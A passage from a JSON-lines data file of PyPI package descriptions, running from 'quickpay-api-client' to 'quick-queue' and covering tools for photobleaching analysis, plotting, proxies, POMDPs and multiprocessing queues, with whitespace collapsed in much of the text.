nomenclature by which files,\ntheir types, and their directories may be referred.API ReferenceThe core of the API is captured within theFilepathclass:classFilepath:# Deconstructs a complete filepath into its constituent elementsdef__init__(self,complete:str)->None:self.complete=complete# Ex: C:\\Users\\myself\\Desktop\\MyFile.txtself.directory=str(Path(self.complete).parent)# Ex: C:\\Users\\myself\\Desktopself.name=str(Path(self.complete).name)# Ex: MyFile.txtself.root=str(Path(self.complete).stem)# Ex: MyFileself.extension=str(Path(self.complete).suffix)# Ex: .txt"} +{"package": "quickpay-api-client", "pacakge-description": "No description available on PyPI."} +{"package": "quickpbsa", "pacakge-description": "quickpbsaFast and Complete Photobleaching Step AnalysisAuthor:Johan HummertOrganization:Herten Lab for Single Molecule Spectroscopy, University of Birmingham, UKLicense:GPLv3Version:2020.0.1Python Package providing a framework for photo-bleaching step analysis. The details of the algorithm used and extensive validation with experimental data are described in a bioRxiv preprint:https://doi.org/10.1101/2020.08.26.268086please cite this publication if you found this package useful.ChangelogNew in version 2021.0.1ParallelisationThe trace analysis can now be run on multiple cores, implemented using multiprocessing. In the analysis functions this can be specified by calling:pbsa.pbsa_file(file,threshold,maxiter,num_cores=8)One core is reserved for queueing and formatting outputs, so if you specify 8 cores, 7 will be used for the analysis. If the code runs on a compute cluster note that the parallisation does not support parallelisation over multiple nodes.DependenciesAlthough the package was tested with specific versions of these packages, other relatively new versions will likely work as well. If you have issues with newer versions of these packages get in touch. If you have issues with older versions please consider updating.Python 3:Tested with python 3.8numpy:Tested with numpy-1.18.2scipy:Tested with scipy-1.4.1pandas:Tested with numpy-1.0.3sympy:Tested with 1.5.1Optional dependendencies for trace extractionIf you want to use the package not only for analysis of photobleaching traces but also for trace extraction from .tiff stacks there are additional dependencies:tifffile:Tested with tifffile-2019.2.10matplotlib:Tested with matplotlib-3.2.1InstallationThe recommended way to install is via pip:pipinstallquickpbsaAlternatively you can clone / download the git repository and place the directory quickpbsa/quickpbsa in your $PYTHONPATH.Getting startedIf you already have photobleaching traces which you would like to analize, running the analysis is a one-liner:importquickpbsaaspbsapbsa.pbsa_file(file,threshold,maxiter)For this to work thefileshould be a .csv file, where each row is one photobleaching trace, which ideally, but not necessarily, should be background subtracted. Then there are two additional parameters to set in the analysis,thresholdandmaxiter. There are many additional optional parameters to set, detailed below, but in many cases the default parameters should be alright.thresholdshould be set to approximately half the intensity difference of a typical photobleaching step. This is most easily accomplished by plotting a few traces and finding steps towards the end of the trace, where steps can most easily be found by eye.maxiteris the maximum number of iterations (i.e. maximum number of steps found). This should be significantly higher than the expected number of steps. In the validation experiments we performed this would typically be set to 200 for samples with up to 35 fluorophores.Structure of the resultThe result is exported as a _result.csv file with 7 rows per photobleaching trace. The final result of the complete analysis for each trace is the one with the type 'fluors_full' in the output file. Furthermore traces where the column 'flag' is not 1 should be discarded. The complete structure of the output file and the individual flags are detailed in the Concept below. Examples on how to use the output are also provided under Examples.with trace extractionIf you have a stack of .tif images and want to extract and analyze traces from it make sure that you havetifffileinstalled. Then there are two options to get traces from your image stack, both of which will yield a _difference.csv file containing background corrected traces ready for the analysis:based on localizationIf the structures from which you want to extract fluorophore numbers are diffraction-limited, you can extract traces based on a .csv file with coordinates (in nanometers) for each diffraction limited spot. The file should contain at least 2 columns named 'x [nm]' and 'y [nm]'. Our recommended way of obtaining such a file is theFijipluginThunderSTORM.The trace extraction can then be accomplished withimportquickpbsaaspbsapbsa.trace_extraction.extract_traces_localization(tiffstack,locfile,r_peak,r_bg1,r_bg2,min_dist)withtiffstackbeing the path to your image stack andlocfilethe path to the localization file.r_peakis the radius (in pixels) of the area around the localization from which the trace is extracted.r_bg1andr_bg2define a ring around the localization from which the background for background correction is extracted.min_distis the minimum distance from one localization to the next. Localizations which are spaced less thanmin_distapart are not considered in the trace extraction.based on a selection maskIf you have larger structures from which to extract photobleaching traces and fluorophore numbers, you can use a mask image which should be an 8bit Tiff with a white selection on black background. The traces are then extracted from non-connected white regions of interest (ROIs or RsOI ...?) in the mask image.importquickpbsaaspbsapbsa.trace_extraction.extract_traces_mask(tiffstack,maskfile,dist,r_bg)where a background ROI with a distance ofdist(in pixels) to the selected ROI and a width ofr_bgis defined for background correction.ConceptThis photobleaching step analysis is a combination of a preliminary step detection and a following refinement of the preliminary result based on a bayesian approach. A full run of the analysis after trace extraction consists of 3 parts.Preliminary step detectionThe preliminary step detection is based on the work of Kalafut and Visscher(10.1016/j.cpc.2008.06.008). In the algorithm steps are sucessively placed and the Schwarz Information Criterion is evaluated with and without the added steps. In the modified version used here steps with a step height below thethresholdparameter are rejected.The optional parameters of the preliminary step detection can be set by providing a dictionary as an optional argument inquickpbsa.pbsa_file():importquickpbsaaspbsapardict={'norm':1000,'crop':False}pbsa.pbsa_file(file,threshold,maxiter,preliminary_optional=pardict)Possible parameters are:norm (default 1)The traces will be divided bynormprior to analysis, mainly for visualization.thresholdshould be set lower accordingly.crop (default True)IfTruethe last frames of the trace are cropped for analysis purposes based onthreshold. Traces are cropped at the last frame where the difference in intensity exceeds half the value ofthreshold+bgframes.bgframes (default 500)How many frames to include in the analysis after the crop point.max_memory (default 2.0)Maximum available memory for the preliminary step detection. The analysis defaults to a slower, but less memory consuming implementation if the necessary memory exceeds this value. For the default of 4 GB the fast implementation is used for traces with up to ~40000 frames.Filtering of tracesBased on the result of the preliminary step detection traces are excluded from the analysis. Assuming that the last two steps are correctly identified in a majority of traces, traces are flagged out. The used flags in the output file are:flagMeaning-1No steps found in preliminary step detection-2Background intensity out of bounds-3Single fluorophore intensity out of bounds-4Trace goes into negative values-5Fluorophore number becomes negative-6interval between final two steps is too shortThe optional parameters of the preliminary step detection can be set by providing a dictionary as an optional argument inquickpbsa.pbsa_file():importquickpbsaaspbsapardict={'subtracted':False,'percentile_step':[20,80]}pbsa.pbsa_file(file,threshold,maxiter,filter_optional=pardict)Possible parameters are:subtracted (default True)IfTrueit is assumed that traces are background corrected. This sets the bounds on the background intensity to[-threshold, threshold]and the default lower bound on the single fluorophore intensity tothreshold. IfFalsethe bounds on the background intensity are set based on the minimum background intensity in the datasetmin_bg:[min_bg, min_bg + threshold]. IfFalsethe default lower bound on the single fluorophore intensity is alsomin_bg + threshold.percentile_step (default 90)Sets the bounds on the single fluorophore intensity. If one value is provided, the upper bound on the single fluorophore intensity is set at this percentile. If two values are provided, as in the example above, lower and upper bounds are set at the percentiles respectively.length_laststep (default 20)Minimum number of frames between the last two steps.Step refinementThe step refinement is based on the posterior as defined in the work of Teskouras et al.(10.1091/mbc.e16-06-0404). The refinement function iteratively minimizes this posterior starting from the result of the preliminary step detection.Most of the optional parameters aim to reduce runtime by reducing the number of possible step arrangements to test. The optional parameters of the step refinement can also be set by providing a dictionary as an optional argument inquickpbsa.pbsa_file():importquickpbsaaspbsapardict={'mult_threshold':1.5,'combcutoff':int(5e6)}pbsa.pbsa_file(file,threshold,maxiter,refinement_optional=pardict)Possible parameters are:multstep_fraction (default 0.5)Maximum fraction of steps with an occupancy higher than 1.nonegatives (default False)IfTrue, no negative double steps are considered. This means that arrangements where 2 or more fluorophore turn back on at the same time are not considered.mult_threshold (1.0)Only steps where the difference in the mean is abovemult_thresholdmultiplied by the last fluorophore intensity are considered as steps with occupancy higher than 1.combcutoff (default 2000000)Maximum number of arrangements to test. If this is exceeded, the trace is flagged out with flag-7. If this happens a lot, consider increasing this value, which will increase runtime.splitcomb (default 30000)How many arrangements to test simultaneously (vectorized). On systems with a large memory this can be increased to speed up the analysis.maxmult (default 5)Maximum considered occupancy, i.e. how many fluorophores can bleach simultaneously.maxadded (default 10)Maximum number of added single steps if no steps are removed to yield an improved posterior.lambda (default 0.1)Hyperparameter $\\lambda$ in equation (1).gamma0 (default 0.5)Hyperparameter $\\gamma_0$ in equation (1).ExamplesDetailed examples with a more in-depth explanation of the algorithm are available in two jupyter notebooks explaining how the analysis works on an example trace (Examples/Example_Trace.ipynb) and an example tiff-stack (Examples/Example_Stack.ipynb) with the included experimental example data. You will need to installjupyterandmatplotlibto run the examples."} +{"package": "quick-pdf", "pacakge-description": "quickpdfInstallationpipinstallquick-pdfUsageMerge PDFquickpdf_merge--helpquickpdf_merge-dir."} +{"package": "quick-perf-tracer", "pacakge-description": "quick_perf_tracerDecodes the perfetto traces super fast"} +{"package": "quickpiggy", "pacakge-description": "QuickPiggyLaunch an impromptu PostgreSQL server, hassle free.Prerequisites:postgresql-server (tested with v9.0 - v13.2), providingpostgres,initdbandcreatedbon your$PATHpostgresql libraries and clients (tested with v9.0 - v13.2), providingpsqlon your$PATHThis is mainly a library module, but you can take it for a for a demo spin by runningquickpiggy.pyas a program (python quickpiggy.py).When used as a library, an ephemeral PostgresSQL instance can be obtained quite easily:pig=quickpiggy.Piggy(volatile=True,create_db='somedb')conn=psycopg2.connect(pig.dsnstring())Many use cases can be accommodated for by supplying appropriate parameters to the constructor of Piggy.This version works with Python 2.7 and 3.1+."} +{"package": "quickping", "pacakge-description": "Quickping\ud83e\udd2f \ud83d\ude80 QuickPing is super fast python package and command line tool to show Active and Deactive Addresses in range of IPv4 Adresses using mutli-threadsInstallpip install quickpingLicenseApache-2.0check out LICENSE file"} +{"package": "quickpip", "pacakge-description": "quickpip - This .rst is seen on pypi."} +{"package": "quickplot", "pacakge-description": "The batteries-included plotting wrapper for matplotlib"} +{"package": "quick-plot", "pacakge-description": "quick plotThe scripting interface of matplotlib is stateful, therefore\ndangerous. The object oriented interface to the plotting library is\npolluted. This tiny library combines the two interfaces into one\ncontext manager.fundamentIf this file is somewhere in your =$PYTHONPATH=, the following code\nshould produce a plot.\u00b4\u00b4\u00b4python\nimport numpy as np\nimport quickwith quick.Plot() as qp:\nqp.plot(np.sin(np.linspace(0, 2 * np.pi)))\n\u00b4\u00b4\u00b4The =Plot= class is the only available class in the =quick= module. It\nshould be instantiated exactly once. Its instance can do everything\nthe matplotlib axis object can do. For some methods, a default\nconfiguration is supplied. There are some methods, that are not\ncontained in the axis object, for example =trajectory=, =field=, =points=,\n=remove_border=, =remove_xticks=. When a method is called, that is neither\na method of the =axis= object, nor one of the additional methods of this\nmodule, then the module =matplotlib.pyplot= is searched for a function\nwith that name, and, if it exists, it is called. When the context\nmanager is left, the plot shows up.arguments=Plot= takes optional arguments.\n| =filename= | given that, the plot is not shown interactively, but saved as a file, default =None= |\n| =figsize= | a tuple, representing (width, height), default =(3, 3)= |\n| =grid= | if =True= shows a grid, default =False |\nall other optional arguments are directly passed to =matplotlib.pyplot.subplot=.short formIf you just want to quickly see some of your data, and you do not want\nto do any customization of the plotting result, the context manager is\na bit of a boilerplate. So there is the following shorthand for the\nprevious script.\u00b4\u00b4\u00b4python\nimport numpy as np\nimport quickquick.plot(np.sin(np.linspace(0, 2 * np.pi)))\n\u00b4\u00b4\u00b4The context manager is called implicitly.more convenienceThe quick module additionally provides a few methods that are not\ndirectly related to the =matplotlib= plotting facility, e.g.=colored=: takes a list of array and return an iterator with tuple,\nwith the data and a color, that can be past to the color argument of\nplotting methods. Optional argument is the name of a colormap=landscape=, =portrait=: they return tuples that can be past to the\n=figsize= argument of =Plot=, internally using the golden ratio.=tex=: surround a string by dollar signs.drawbackThere is no interactive workflow anymore with this approach. I like\nthat way of working, because due to script restarts you eliminate all\nerrors in your script, that may occur from state changes from the\npast, that confuses the (fragile) python module system."} +{"package": "quickplotlib", "pacakge-description": "QuickplotThis is a beta release of the quickplot module, a wrapper around pandas, matplotlib, and seaborn used to quickly create beautiful viz for analytics.To install, run:pip install quickplotlib"} +{"package": "quickplot-niccolo-hamlin", "pacakge-description": "Failed to fetch description. HTTP Status Code: 404"} +{"package": "quickplots", "pacakge-description": "An object-oriented plotting library for Python, with simplicity as its principal aim."} +{"package": "quickplotter", "pacakge-description": "Instant EDAInstantly generate common exploratory data plots without having to worry about cleaning your data.Note: To find the most updated documentation, visit the Githubrepo.Description: Thequickplottermodule provided here is meant to provide common exploratory data plots without having to worry about cleaning your DataFrame or preanalyzing your data. Additionally, these plots can be exported to.{png, jpeg}for use in reports and papers.1. Basic Usage:plotter=quickplotter.QuickPlotter(df:pd.DataFrame)#creates a QuickPlotter object with the given DataFrameplotter.common(subset=['correlation','percent_nan'])#plots correlation between features, and percent nan in each columnplotter.distribution(column_subset=df.columns[0:4])#plots distributions for the first four columns in the DataFrameplotter.common(column_subset=['body_mass_index','blood_type'])#plots common plots for the given columns2. FundamentalsIf the number ofNaNvalues in the DataFrame is<= 5%of the total values, the NaN rows will be dropped and the plots will be generated without them.Remember, this is meant to be a quick and dirty tool for exploration, and not for being delicate with each data entry.subset & diff listsThe quickplot module works mainly with two specifications,subsetanddiff.For anysubset-like list, the items in the list will be used. For anydiff-like list, all itemsexceptthose in the list will be used.The options are as follow:subset: Use only the plots specified in the listdiff: Use all plotsexceptthose specified in the listsubset_columns: Use all columns specified in the list. Can either bedf.columnsslicing or by namediff_columns: Use all columnsexceptthose specified in the list. Can either bedf.columnsslicing or by name.3. ContributingIf you have read this far I hope you've found this tool useful. I am always looking to learn more and develop as a collaborative programmer, so if you have any ideas or contributions, feel free to write a feature or pull request."} +{"package": "quickplug", "pacakge-description": "No description available on PyPI."} +{"package": "quickpomdps", "pacakge-description": "quickpomdps - pythonquickpomdpsis a package to quickly define[PO]MDPsin Python.\nYou can use any of the solvers inPOMDPs.jlecosystem, directly in Python.A hybrid continuous-discrete light-dark problem definition and QMDP solution (taken fromexamples/lightdark.py) looks like this:r=60light_loc=10deftransition(s,a):ifa==0:returnDeterministic(r+1)else:returnDeterministic(min(max(s+a,-r),r))defobservation(s,a,sp):returnNormal(sp,abs(sp-light_loc)+0.0001)defreward(s,a,sp):ifa==0:return100.0ifs==0else-100.0else:return-1.0m=QuickPOMDP(states=range(-r,r+2),actions=[-10,-1,0,1,10],discount=0.95,isterminal=lambdas:s<-rors>r,obstype=Float64,transition=transition,observation=observation,reward=reward,initialstate=Uniform(range(-r//2,r//2+1)))solver=QMDPSolver()policy=solve(solver,m)Installationpipinstallquickpomdpsquickpomdpsuses thepyjulia packagewhich requires julia to be installed. We recommend usingjuliaupfor this purpose.Upon invocation ofimport quickpomdsin Python, all Julia dependencies will be installed if they are not already present.\nPlease note that, by default, the Julia dependencies are added to theglobalenvironment.\nIf you want to install these dependencies to a local environment instead, export theJULIA_PROJECTwith the desired path as documentedhere.DevelopmentThis package usespython-poetryfor dependency\nmanagement. Thus, it may be installed via one of the mayways supported by poetry, for example,gitclonehttps://github.com/JuliaPOMDP/quickpomdpscdquickpomdps\npoetryinstall\npoetryrunpythonexamples/lightdark.pyUsageSeeexamples/andtests/. Documentation can be found at theQuickPOMDPs.jlandPOMDPs.jlpackages.HelpIf you need help, please ask on thePOMDPs.jl discussions page!"} +{"package": "quickpool", "pacakge-description": "quickpoolUse ProcessPoolExecutor and ThreadPoolExecutor from concurrent.futures with a progress bar and less boilerplate.InstallationInstall with:pip install quickpoolUsage>>> import random\n>>> import time\n>>> import quickpool\n>>> def naptime(base_duration: float, multiplier: float, return_val: int)->int:\n... time.sleep(base_duration * multiplier)\n... return return_val\n...\n>>> def demo():\n... iterations = 25\n... pool = quickpool.ThreadPool(\n... functions = [naptime] * iterations,\n... args_list = [(random.random() * 5, random.random()) for _ in range(iterations)],\n... kwargs_list = [{\"return_val\": i} for i in range(iterations)])\n... results = pool.execute()\n... print(results)\n...\n>>> demo()\n \u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501 100% 3s\n[0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 16, 17, 18, 19, 20, 21, 22, 23, 24]"} +{"package": "quick-pp", "pacakge-description": "quick_ppPython package to assist in providing quick-look/ preliminary petrophysical estimation.Free software: MIT licenseDocumentation:https://quick-pp.readthedocs.io.FeaturesTODOHistory0.1.0 (2023-10-08)First release on PyPI.0.1.2 (2024-01-19)Refactor config.0.1.3 (2024-01-20)Update requirements.0.1.4 (2024-02-04)Update docstrings."} +{"package": "quick-preprocessing", "pacakge-description": "## quick_preprocessing\nThis package is meant to quickly preprocess text data to save developers time. This package includes lemmatization, stemming, punctuation removal, spelling correction, stopwords removal and many more.##Documentationhttps://ankurdas-krypto.github.io/quick_preprocessing/"} +{"package": "quickprophet", "pacakge-description": "Quick-ProphetA quick workflow using Prophet with relatively easy datasets. It can be modified to take any of the usual behaviours of Prophet, and can run a Prophet model on each group in a specified collection of groups."} +{"package": "quickproxy", "pacakge-description": "A lightweight, asynchronous, programmable HTTP proxy for python. Built with Tornado.## Use#### A simple proxy:import quickproxy\nquickproxy.run_proxy(port=8080)#### A reverse proxy:This proxy will fetch responses from an AWS s3 bucket with the same ID as the request\u2019s hostname.def callback(request):request.host = request.host+\u201d.s3-website-us-east-1.amazonaws.com\u201d\nrequest.port = 80\nreturn requestquickproxy.run_proxy(port=8080, req_callback=callback)## ReferenceQuickproxy exposes just one function:run_proxy(port,methods=[\u2018GET\u2019, \u2018POST\u2019],\nreq_callback=DEFAULT_CALLBACK,\nresp_callback=DEFAULT_CALLBACK,\nerr_callback=DEFAULT_CALLBACK,\nstart_ioloop=True)It runs a proxy on the specified port. You can pass the following parameters to configure quickproxy:methods: the HTTP methods this proxy will supportreq_callback: a callback that is passed a RequestObj that it shouldmodify and then return. By default this is the identity function.resp_callback: a callback that is given a ResponseObj that it shouldmodify and then return. By default this is the identity function.err_callback: in the case of an error, this callback will be called.there\u2019s no difference between how this and the resp_callback are\nused. By default this is the identity function.start_ioloop: if True (default), the tornado IOLoop will be startedimmediately.### Request callback functionsThe request callback should receive a RequestObj and return a RequestObj.request_callback(requestobj)return requestobjThe RequestObj is a python object with the following attributes that can be modified before it is returned:protocol: either \u2018http\u2019 or \u2018https\u2019host: the destination hostname of the requestport: the port for the requestpath: the path of the request (\u2018/index.html\u2019 for example)query: the query string (\u2018?key=value&other=value\u2019)fragment: the hash fragment (\u2018#fragment\u2019)method: request method (\u2018GET\u2019, \u2018POST\u2019, etc)username: always passed as None, but you can set it to override the userpassword: None, but can be set to override the passwordbody: request body as a stringheaders: a dictionary of header / value pairs(for example {\u2018Content-Type\u2019: \u2018text/plain\u2019, \u2018Content-Length\u2019: 200})follow_redirects: true to follow redirects before returning a response### Response callback functionsThe response and error callbacks should receive a ResponseObj and return a ResponseObj, similar to the request callback above.The ResponseObj is a python object with the following attributes that can be modified before it is returned:code: response code, such as 200 for \u2018OK\u2019headers: the response headerspass_headers: a list or set of headers to pass along in the response. Allother headers will be stripped out. By default this includes:(\u2018Date\u2019, \u2018Cache-Control\u2019, \u2018Server\u2019, \u2018Content-Type\u2019, \u2018Location\u2019)body: response body as a string## CreditsMuch of this code was adopted from Senko\u2019s tornado-proxy:https://github.com/senko/tornado-proxy\u2026which is itself based on the code by Bill Janssen posted to:http://groups.google.com/group/python-tornado/msg/7bea08e7a049cf26"} +{"package": "quickpt", "pacakge-description": "About The ProjectThis is a small Python Function that allows you to see the variance, percentage of missing values and unique values within a dataset.pip install quickptfromquickpt.quickptimportquickptquickpt(df,graph=None,encode=True,width=800,height=400)More information on the projectGitHubContributingContributions are what make the open source community such an amazing place to learn, inspire, and create. Any contributions you make aregreatly appreciated.Fork the ProjectCreate your Feature Branch (git checkout -b feature/AmazingFeature)Commit your Changes (git commit -m 'Add some AmazingFeature')Push to the Branch (git push origin feature/AmazingFeature)Open a Pull RequestChange Log0.0.1 (06/02/22)First Release\n0.0.2 (06/02/22)Update Readme and GitHub Link\n0.0.3 (06/02/22)testing until working\n0.0.4 (06/02/22)testing until working\n0.0.5 (06/02/22)Set encoder default to False\n0.0.6 (06/02/22)added width and height parameters for graph visualization\n0.0.7 (06/03/22)fixed variance calculation"} +{"package": "quickpy", "pacakge-description": "UNKNOWN"} +{"package": "quick.py", "pacakge-description": "UNKNOWN"} +{"package": "quick-pypi", "pacakge-description": "Quick-PyPIThe simplest and quickest way to build and publish a PyPI packageInstallationpip install quick-pypiMinimum ExampleBefore you start, you need to have several things:Determine a unique PyPI package name, easy to remember, like 'quick-pypi-test';Have a PyPI account, then export your upload token to a txt file in your computer;Use PyCharm IDE or VSCode to develop your own package. We support Jupyter Notebook now!Step 1: Prepare your project tree like:Project Root\n -- src\n -- your_package_name\n -- __init__.py\n -- your_class.py # where you can write your own code!\n -- dists # auto generated folder storing uploading version history\n -- 0.0.1\n -- 0.0.2\n -- ...\n -- VERSION # a file storing the latest version of uploading\n quick_pypi.py # Main settings of uploading packageStep 2: The simplestquick_pypi.pyfile content is below:fromquick_pypi.deployimport*auto_deploy(cwd=os.path.dirname(os.path.realpath(__file__)),# When using jupyter notebook, using `cwd=os.getcwd()`name=\"quick-pypi-test\",description=\"This is a quick-pypi-test package!\",pypi_token='../../pypi_upload_token.txt',# the token string or path from your PyPI account)Step 3: Deploy the package to PyPI serverAfter you finish writing your codes in thesrcpackage, you can just simply right-click thequick-pypi.pyto run, and wait for its completion.Step 4: Check if the package is uploaded successfully!Complicated Example settings for advanced usersA real example is here:fromquick_pypi.deployimport*# or you can use: `from quick_pypi.deploy_toml import *`auto_deploy(cwd=os.path.dirname(os.path.realpath(__file__)),name=\"pyrefworks\",long_name=\"A Python Toolkit for RefWorks Data Analysis\",description=\"Converting RefWorks files into a CSV table file\",long_description=\"This is a project to convert RefWork files to a CSV file\",src_root=\"src\",dists_root=f\"dists\",pypi_token='../pypi_upload_token.txt',# a file storing the token from your PyPI accounttest=False,# determine if uploading to test.pypi.orgversion=\"0.0.1a0\",# fixed version when uploading or using version='auto'project_url=\"http://github.com/dhchenx/pyrefworks\",author_name=\"Donghua Chen\",author_email=\"xxx@xxx.com\",requires=\"quick-csv\",license='MIT',license_filename='LICENSE',keywords=\"refworks, csv file\",github_username=\"dhchenx\",max_number_micro=20,# major.minor.micromax_number_minor=20,# version maximum numbers in each part, e.g. 0.0.20 --> 0.1.0; 0.20.20 --> 1.0.0# only_build=True)Here you can provide more information about your package, like setting your author's name, email, license, short or long names and descriptions, etc.Deploy to local computer without uploadimportquick_pypiasqpqp.deploy(src_root=\"src\",dist_root='data/dist1',# name=\"quick-pypi-test\",# description=\"This is a quick-pypi project\",version=\"0.0.1a0\",# fixed version number, wont change# project_url=\"http://github.com/dhchenx/quick-pypi-test\",# author_name=\"Donghua Chen\",# author_email=\"douglaschan@126.com\",# requires=\"jieba;quick-crawler\",# license='MIT',# license_filename='LICENSE')This will generate a series of actual package files (e.g. README.md, LICENSE,setup.py, etc. ).Then, you can manually build the package through twine in the directory ofdist1.An example using our toolkit to deploy in the PyPI platform is demonstratedhere.LicenseThequick-pypiproject is provided byDonghua Chen."} +{"package": "quick-pypi-test", "pacakge-description": "A quick-pypi-test package!This is a quick-pypi-test package!Installationpip install quick-pypi-test==0.0.4LicenseThis project follows the MIT license."} +{"package": "quickpython", "pacakge-description": "Read Latest Documentation-Browse GitHub Code RepositoryQuickPYTHONA retro-futuristic educational interactive coding environment. Powered by Python and nostalgia.Key featuresMouse supportFuturistic blue color schemeAuto-formattingIntegrated Debugging SupportQuick shortcuts for creating new dataclasses, static methods, etcBuilt-in helpGames!Quick Start Instructionspipinstallquickpythonthen start withqpythonorquickpythonDisclaimer: This project is provided as-is, for fun, with no guarantee of long-term support or maintenance."} +{"package": "quickpython-mvc", "pacakge-description": "Python rapid development framework"} +{"package": "quickq", "pacakge-description": "# Django Quick QueueDjango Quick Queue is a fast and simple way to use async tasks in Django. This package has a limited use case. If you are looking for a more complex async task systems you should try Django Q, Celery, or Huey. Quick Queue is meant to give you the simplest method to get started executing small asynchronous tasks.# Installation### 1. Install Package`pip install quickq`### 2. Add Base URL to settings.py```pythonQQ_BASE_URL = 'https://mysite.example.com'```### 3. Setup the view in your urls.py```pythonfrom quickq import taskinatorurlpatterns = [url(r'^taskinator/(\\S+)$', taskinator, name=\"taskinator\"),...]```### 4. Add the Task decorator to any function```pythonfrom quickq import Task@Task()def send_approved (name, slug, email):send_mail('Yay E-mail!',message,settings.DEFAULT_FROM_EMAIL,[email],fail_silently=False,)# With a custom Timeout@Task(timeout=120)def another_task ():do_stuff()```### 5. Execute your task as normal```pythonsend_email('Narf', 'narf-me', 'narf@aol.com')```## How it Works1. Your task is called1. A PyJWT is generated.2. The taskinator URL is called asynchronously.2. Taskinator view executed1. Decodes the JWT.2. Excutes the original task function outside of the original request.## Limitations- Function arguments are converted to JSON so they must be JSON compatible.- Request time may be limited. If your webserver has a limitation on request time then that will also affect how long your tasks can execute since they are simply web requests. The request is also limited by the `QQ_REQUEST_TIMEOUT` setting.## Additional Settings```QQ_TOKEN_EXPIRATION: Default 60QQ_TOKEN_ALGORITHMS: Default ['HS256']QQ_URL_NAME: Default 'taskinator'QQ_REQUEST_TIMEOUT: Default 60```## ScalingWhile Quick Queue is limited it still could scaled in with a few tricks.- Run a separate web server just for Queue tasks. This would allow you scale your task queue differently and change your request timeout values.- additional?## Future Goals- add task retries- multiple queue URLs"} +{"package": "quick_qemu", "pacakge-description": "installpip3 install quick_qemuexecutepython-mquick_qemu...\nor\nquick_qemu...environmentQUICK_QEMU_OUTPUT: set output, default spice-appQUICK_QEMU_NOGL: if set disables ql renderingQUICK_QEMU_CPU: change virtual cpuQUICK_QEMU_MACHINE: change virtual acpiexamplepython-mquick_qemu~/Downloads/archlinux.iso"} +{"package": "quick-question", "pacakge-description": "No description available on PyPI."} +{"package": "quick-queue", "pacakge-description": "Quick Multiprocessing QueueThis is an implementation of Quick Multiprocessing Queue for Python and work similar tomultiprocessing.queue(more\ninformation aboutmultiprocessing.queueinhttps://docs.python.org/3/library/multiprocessing.html?highlight=process#pipes-and-queues).InstallLast release version of the project to install in:https://pypi.org/project/quick_queue_project/pip install quick-queueIntroductionThe motivation to create this class is due tomultiprocessing.queueis too slow putting and getting elements\nto transfer data between python processes.But if you put or get one list with elements work similar as put or get one single element; this list is getting as\nfast as usually but this has too many elements for process in the subprocess and this action is very quickly.In other words, Multiprocess queue is pretty slow putting and getting individual data, then QuickQueue wrap several\ndata in one list, this list is one single data that is enqueue in the queue than is more quickly than put one\nindividual data.While Producer produce and put lists of elements in queue, subprocesses consume those lists and iterate every element,\nthen subprocesses have elements very quickly.Quick useQuickQueueImport:fromquick_queueimportQQueuePseudocode without process:qq=QQueue()# << Add here `qq` to new process(es) and start process(es) >>qq.put(\"value\")# Put all the values you needqq.end()# When end put values call to end() to mark you will not put more values and close QQueueComplete example (it needsimport multiprocessing):def_process(qq):print(qq.get())print(qq.get())print(qq.get())if__name__==\"__main__\":qq=QQueue()p=multiprocessing.Process(target=_process,args=(qq,))p.start()qq.put(\"A\")qq.put(\"B\")qq.put(\"C\")qq.end()p.join()Note: you need to callendmethod to perform remain operation and close queue. If you only want put remain data in\nqueue, you can callput_remain, then you need to call manually toclose(orend, this performscloseoperation\ntoo).You can put all values in one iterable or several iterables withput_iterablemethod (put_iterableperform remain\noperation when iterable is consumed; but this not close queue, you need call toclose()or toend()in this case):def_process(qq):print(qq.get())print(qq.get())print(qq.get())if__name__==\"__main__\":qq=QQueue()p=multiprocessing.Process(target=_process,args=(qq,))p.start()qq.put_iterable([\"A\",\"B\",\"C\"])qq.put_iterable([\"D\",\"E\",\"F\"])qq.end()p.join()If you need to useputin other process, then you need to initialize values in QQueue withinit. Due to\nPython message pass between process it is not possible share values in the same shared Queue object (at least I have\nnot found the way) and, by other side, maybe you want to define a different initial values per \"put process\" to\nsensor work calculation.def_process(qq):# Define initial args to this process, if you do not call to init method, then it use default valuesqq.init(\"\"\"\"\"\")qq.put(\"A\")qq.put(\"B\")qq.put(\"C\")qq.end()if__name__==\"__main__\":qq=QQueue()p=multiprocessing.Process(target=_process,args=(qq,))p.start()print(qq.get())print(qq.get())print(qq.get())p.join()You can use defined args in the main constructor if you pass values. You can get initial args\nwithget_init_args(return a dict with your args) in process where you instanced QQueue,\nthen in second process you can expand those args ininitmethod with**.def_process(qq,init_args):qq.init(**init_args)qq.put(\"A\")qq.put(\"B\")qq.put(\"C\")qq.end()if__name__==\"__main__\":qq=QQueue(\"\"\"\"\"\")p=multiprocessing.Process(target=_process,args=(qq,qq.get_init_args()))p.start()print(qq.get())print(qq.get())print(qq.get())p.join()QuickJoinableQueueYou can use a Joinable Queue if you want usejoinandtask_donein queue.Import:fromquick_queueimportQJoinableQueuePseudocode without process:qjq=QJoinableQueue()# << Add here `qq` to new process(es) and start process(es) >>qjq.put(\"value\")# Put all the values you needqjq.join()# When end put values call to put_remain() or join() to mark you will not put more values QJoinableQueue.qjq.close()# You can close QJoinableQueue with close()Complete example (it needsimport multiprocessing):def_process(qjq):print(qjq.get())qjq.task_done()print(qjq.get())qjq.task_done()print(qjq.get())qjq.task_done()if__name__==\"__main__\":qjq=QJoinableQueue()p=multiprocessing.Process(target=_process,args=(qjq,))p.start()qjq.put(\"A\")qjq.put(\"B\")qjq.put(\"C\")qjq.join()qjq.close()p.join()Note: withjoinyou have not call toendbecause this close the queue.joinmethod perform remain operation\n(put_remain) but not close the queue or callput_remaindirectly if you need it. You need to call manually toclosebecause afterjoinyou can to do other operations with this queue.You can put all values in one iterable or several iterables withput_iterablemethod (put_iterableperform remain\noperation when iterable is consumed; but this not close queue, you need call toclose()in this case):def_process(qjq):print(qjq.get())qjq.task_done()print(qjq.get())qjq.task_done()print(qjq.get())qjq.task_done()if__name__==\"__main__\":qjq=QJoinableQueue()p=multiprocessing.Process(target=_process,args=(qjq,))p.start()qjq.put_iterable([\"A\",\"B\",\"C\"])qjq.put_iterable([\"D\",\"E\",\"F\"])qjq.join()qjq.close()p.join()If you need to useputin other process, then you need to initialize values in QJoinableQueue 